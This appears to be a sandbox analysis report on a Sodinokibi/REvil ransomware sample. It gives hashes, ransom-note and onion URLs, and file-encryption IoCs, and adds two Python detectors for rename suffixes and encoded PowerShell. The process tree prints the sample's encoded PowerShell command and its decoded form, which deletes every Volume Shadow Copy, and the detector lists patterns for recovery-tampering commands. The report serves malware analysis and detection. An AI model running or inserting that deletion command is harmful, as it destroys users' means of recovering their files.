Analysis
- max time kernel: 147s
- max time network: 6s
- platform: windows7_x64
- resource: win7v200722
- submitted: 01-08-2020 09:48
Static task: static1
Behavioral task: behavioral1
- Sample: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- Resource: win10
General
- Target: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- Size: 116KB
- MD5: 90e6ea15ed18005b431e135186d57abf
- SHA1: d8e126cd0f5f3f214989c3533fd22c7291c44174
- SHA256: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d
- SHA512: 91690e64b9d39b2b1c0fb7575d75d632f5fbe1dd6c36b935ea2fde1e7bbbfc0e68ba50d73919f4cb2502d7e2b46fe98a3ddcb217b3cb1da77fc290e86031c60d
Malware Config
Extracted
- Path: C:\g99p63b-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E976AC921A981160
  - http://decryptor.cc/E976AC921A981160
Signatures
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bik0t446i89.bmp"
Modifies service (2 TTPs, 5 IoCs)
Process: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Note: all five keys are written by vssvc.exe, the Volume Shadow Copy service itself, as it initialises its writers; the sample does not touch them. Their value is indirect: they show that VSS was started during the run, which is consistent with the shadow-copy deletion the sample issues through its PowerShell child.
Modifies extensions of user files (7 IoCs)
Ransomware generally changes the extension on encrypted files. Here every renamed file receives the same appended suffix, .g99p63b, and the same token names the ransom note (g99p63b-readme.txt) extracted above.
Process: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- File renamed: C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.g99p63b
- File renamed: C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.g99p63b
- File renamed: C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.g99p63b
- File renamed: C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.g99p63b
- File renamed: C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.g99p63b
- File renamed: C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.g99p63b
- File renamed: C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.g99p63b
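The rename and file-drop IoCs in this report carry the two artefacts a defender keys on: one new suffix appended to many files, and a ransom note whose name contains the same token. The Python below is an added example, not part of the report or of the sandbox that produced it. It parses IoC lines in the report's own "File renamed A => B" and "File created P" wording, groups renames by appended suffix, and flags any suffix seen on at least five files together with whether a matching note was dropped. The five-file threshold and the <token>-readme.txt naming rule are assumptions chosen for illustration; the input lines are copied from the report.

```python
import re
from collections import Counter

# IoC lines copied from the "Modifies extensions of user files" and
# "Drops file in Program Files directory" sections of this report.
IOC_LINES = [
    r"File renamed C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.g99p63b",
    r"File renamed C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.g99p63b",
    r"File created \??\c:\program files\g99p63b-readme.txt",
    r"File created \??\c:\program files (x86)\g99p63b-readme.txt",
    r"File opened for modification \??\c:\program files\InvokeNew.midi",
]

RENAME_RE = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+)$")
CREATE_RE = re.compile(r"^File created (?P<path>.+)$")
# Assumed ransom-note naming rule: <token>-readme.txt, as in g99p63b-readme.txt.
NOTE_RE = re.compile(r"^(?P<token>[a-z0-9]+)-readme\.txt$")


def basename(path):
    """Lower-cased final path component, with the NT \\??\\ prefix stripped."""
    path = path.lower()
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.rsplit("\\", 1)[-1]


def appended_suffix(src, dst):
    """Suffix appended to the original file name by a rename, or None when the
    rename changed the name some other way (move, different base name)."""
    s, d = basename(src), basename(dst)
    if d.startswith(s + ".") and len(d) > len(s) + 1:
        return d[len(s) + 1:]
    return None


def ransomware_rename_indicators(ioc_lines, min_files=5):
    """Group renames by appended suffix and report every suffix seen on at
    least min_files files, noting whether a ransom note with that token
    was created during the same run."""
    suffixes = Counter()
    note_tokens = set()
    for line in ioc_lines:
        m = RENAME_RE.match(line)
        if m:
            suffix = appended_suffix(m["src"], m["dst"])
            if suffix:
                suffixes[suffix] += 1
            continue
        m = CREATE_RE.match(line)
        if m:
            n = NOTE_RE.match(basename(m["path"]))
            if n:
                note_tokens.add(n["token"])
    return [
        {"extension": suffix, "files": count, "note_dropped": suffix in note_tokens}
        for suffix, count in suffixes.items()
        if count >= min_files
    ]


if __name__ == "__main__":
    for hit in ransomware_rename_indicators(IOC_LINES):
        print(hit)
```

On the report's lines this yields a single hit: extension g99p63b on 7 files with a matching note. The suffix is compared after lower-casing because the sandbox records the source path as typed by the user and the destination as an NT path, so a naive string comparison would miss every rename.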
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Enumerates connected drives (3 TTPs)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1620, bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- Token: SeDebugPrivilege, PID 384, powershell.exe
- Token: SeBackupPrivilege, PID 1908, vssvc.exe
- Token: SeRestorePrivilege, PID 1908, vssvc.exe
- Token: SeAuditPrivilege, PID 1908, vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 1620, bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe, powershell.exe
- PID 1620, bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- PID 384, powershell.exe
- PID 384, powershell.exe
Suspicious use of WriteProcessMemory (4 IoCs)
Process: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- PID 1620 wrote to memory of 384: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe (1620) -> powershell.exe (384)
- PID 1620 wrote to memory of 384: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe (1620) -> powershell.exe (384)
- PID 1620 wrote to memory of 384: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe (1620) -> powershell.exe (384)
- PID 1620 wrote to memory of 384: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe (1620) -> powershell.exe (384)
Drops file in Program Files directory (35 IoCs)
Process: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
- File opened for modification: \??\c:\program files\InvokeNew.midi
- File created: \??\c:\program files\microsoft sql server compact edition\g99p63b-readme.txt
- File opened for modification: \??\c:\program files\SplitHide.gif
- File opened for modification: \??\c:\program files\UninstallResolve.mpeg3
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\g99p63b-readme.txt
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\g99p63b-readme.txt
- File opened for modification: \??\c:\program files\InstallPop.ttf
- File opened for modification: \??\c:\program files\StopUnpublish.docx
- File opened for modification: \??\c:\program files\SwitchImport.ppsm
- File opened for modification: \??\c:\program files\GroupCheckpoint.vdx
- File opened for modification: \??\c:\program files\OutClose.mov
- File opened for modification: \??\c:\program files\ReadConvertFrom.zip
- File opened for modification: \??\c:\program files\RedoComplete.ex_
- File opened for modification: \??\c:\program files\UndoTest.au3
- File created: \??\c:\program files\g99p63b-readme.txt
- File opened for modification: \??\c:\program files\ConfirmRead.xht
- File opened for modification: \??\c:\program files\ConvertToJoin.wvx
- File opened for modification: \??\c:\program files\GrantComplete.xlsx
- File opened for modification: \??\c:\program files\InitializeProtect.eps
- File opened for modification: \??\c:\program files\MergeFind.wma
- File opened for modification: \??\c:\program files\MoveSelect.edrwx
- File opened for modification: \??\c:\program files\OpenHide.vdx
- File opened for modification: \??\c:\program files\PopRegister.clr
- File created: \??\c:\program files (x86)\g99p63b-readme.txt
- File opened for modification: \??\c:\program files\FindReset.wmx
- File opened for modification: \??\c:\program files\RepairPop.docx
- File opened for modification: \??\c:\program files\ImportInstall.vsdm
- File opened for modification: \??\c:\program files\ResolveConvertFrom.xlsx
- File opened for modification: \??\c:\program files\RevokeStep.docx
- File opened for modification: \??\c:\program files\TraceCheckpoint.mp2
- File opened for modification: \??\c:\program files\ConvertCompare.mp2
- File opened for modification: \??\c:\program files\ConvertToInitialize.mpe
- File opened for modification: \??\c:\program files\RevokeResize.dotx
- File opened for modification: \??\c:\program files\ConvertToUpdate.vdw
- File opened for modification: \??\c:\program files\UnregisterInitialize.dotm
Processes
- C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe (PID 1620)
  Command line: "C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"
  - Sets desktop wallpaper using registry
  - Modifies extensions of user files
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - Drops file in Program Files directory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 384, child of 1620)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    Decoded (-e is -EncodedCommand; the value is base64 of the script as UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    This deletes every Volume Shadow Copy through WMI so that encrypted files cannot be recovered from snapshots. It explains the two system processes below: unsecapp.exe is the WMI asynchronous-callback sink, started via DCOM (-Embedding) when a WMI client connects, and vssvc.exe is the Volume Shadow Copy service servicing the delete.
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 1908)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
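The encoded PowerShell command in the process tree is the decisive action of this run and the first thing an analyst decodes. The Python below is an added example, not part of the report or of the sandbox that produced it. It finds the argument following any prefix of -EncodedCommand (PowerShell accepts -e, -ec, -enc and so on, so a detector that only matches the full switch name misses this sample), decodes it as base64-wrapped UTF-16LE, and checks the plaintext against a small set of shadow-copy and recovery-tampering patterns. The pattern names and the pattern list are assumptions chosen for illustration; the command line is the one recorded above.

```python
import base64
import re

# Command line of the PowerShell child (PID 384) copied from the process tree above.
REPORT_CMDLINE = "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="

ENCODED_FLAG = "encodedcommand"

# Assumed detection patterns (the names are ours). Each one targets a documented
# way of destroying Volume Shadow Copies or disabling Windows recovery.
SHADOW_TAMPER_PATTERNS = [
    ("wmi_shadowcopy_delete", re.compile(r"win32_shadowcopy.*\.delete\s*\(", re.I | re.S)),
    ("vssadmin_delete_shadows", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic_shadowcopy_delete", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("wbadmin_delete_catalog", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("bcdedit_recovery_disabled", re.compile(r"bcdedit(\.exe)?.*recoveryenabled\s+no", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    and the value is base64 of the script text encoded as UTF-16LE.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag and ENCODED_FLAG.startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                # Switch present but the payload is not valid base64/UTF-16LE.
                return None
    return None


def analyze_commandline(cmdline):
    """Decode the command if it is encoded, then report which tampering
    patterns the plaintext matches."""
    plaintext = decode_encoded_command(cmdline) or cmdline
    hits = [name for name, rx in SHADOW_TAMPER_PATTERNS if rx.search(plaintext)]
    return {"decoded": plaintext, "shadow_copy_tampering": hits}


if __name__ == "__main__":
    print(analyze_commandline(REPORT_CMDLINE))
```

Matching is done on the decoded text rather than the raw command line because the base64 form of the same script changes with any whitespace or casing difference, while the WMI class and method names in the plaintext do not. The prefix rule deliberately rejects -ex and -ep, which resolve to -ExecutionPolicy.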
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/384-0-0x0000000000000000-mapping.dmp (memory dump of PID 384, powershell.exe)